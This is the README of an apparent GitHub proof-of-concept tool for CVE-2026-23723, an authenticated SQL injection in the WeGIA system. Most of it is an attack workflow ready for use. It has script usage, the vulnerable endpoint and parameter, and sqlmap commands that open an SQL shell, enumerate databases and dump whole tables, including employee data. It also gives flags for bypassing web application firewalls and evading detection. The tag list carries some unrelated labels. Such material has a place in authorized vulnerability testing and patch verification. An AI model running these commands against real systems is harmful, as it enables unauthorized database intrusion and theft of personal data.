Ch35h1r3c47/CVE-2026-23723-POC
GitHub: Ch35h1r3c47/CVE-2026-23723-POC
针对 WeGIA 系统认证型 SQL 注入漏洞的 sqlmap 请求文件自动生成工具。
Stars: 3 | Forks: 1
# CVE-2026-23723 PoC - WeGIA 认证 SQL 注入漏洞利用辅助工具
**WeGIA ≤ 3.6.1 中的认证型报错 SQL 注入**
**GHSA-xfmp-2hf9-gfjp** | [官方公告](https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp)
**PoC 原作者 / 报告者**: [ViniCastro2001](https://github.com/ViniCastro2001)
**GHSA 发布者**: nilsonLazarin (项目维护者)
此轻量级 Python 脚本可自动化执行:
- 使用提供的凭据登录 WeGIA 系统
- 提取有效的 PHP 会话 Cookie
- 生成兼容 sqlmap 的请求文件(注入点标记为 `id_memorando=1*`)
- 输出可直接运行的 sqlmap 命令,用于枚举、交互式 Shell 和数据导出
### 功能特性
- 尝试多种常见的登录路径和表单字段名称,以提高兼容性
- 生成 sqlmap 请求文件 (.req)
- 提供可直接复制粘贴的 sqlmap 命令,用于:
- 交互式类 MySQL Shell (`--sql-shell`)
- 数据库/表枚举
- 定向表导出或全库导出
### 环境要求
- Python 3.x
- `requests` 库(大多数渗透测试环境通常已安装)
- 已安装 [sqlmap](https://github.com/sqlmapproject/sqlmap) 并添加至 PATH
### 安装
```
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
```
### 使用方法
```
# 推荐:交互式密码提示
python CVE-2026-23723.py --url http://target.com -u admin
# 直接提供密码
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# 自定义输出文件
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
```
成功运行后,该脚本将:
尝试登录
生成 wegia_sqlmap.req(或您自定义的文件名)
显示可直接使用的 sqlmap 命令
### 示例生成的命令:
```
# 1. 交互式 MySQL-like shell(最推荐)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. 显示当前及所有数据库
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. 列出 wegia 数据库中的表
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. 导出特定表(示例:funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. 导出整个 wegia 数据库(请注意!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Optional sqlmap flags:
--proxy=http://127.0.0.1:8080 (through Burp/ZAP)
--tamper=space2comment,randomcase (basic WAF bypass)
--delay=1 (slow down to avoid detection)
```
如果自动登录失败
通过浏览器手动登录 → 复制完整的 Cookie 头 → 直接运行 sqlmap:
```
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
```
法律声明
本 PoC 仅供教育和授权渗透测试目的使用。
未经授权对任何系统使用本工具是非法的,并受到禁止。
作者和贡献者不对滥用行为或造成的任何损害承担责任。
参考信息
GHSA-xfmp-2hf9-gfjp
CVE-2026-23723
标签:CISA项目, CVE-2026-23723, GHSA-xfmp-2hf9-gfjp, PE 加载器, PHP 会话利用, PoC 验证, Python, RCE 辅助, sqlmap 辅助, SQL 注入, Web 安全, WeGIA, 恶意脚本, 数据库攻击, 无后门, 漏洞复现, 网络安全, 自动化攻击, 认证后漏洞, 逆向工具, 错误型注入, 隐私保护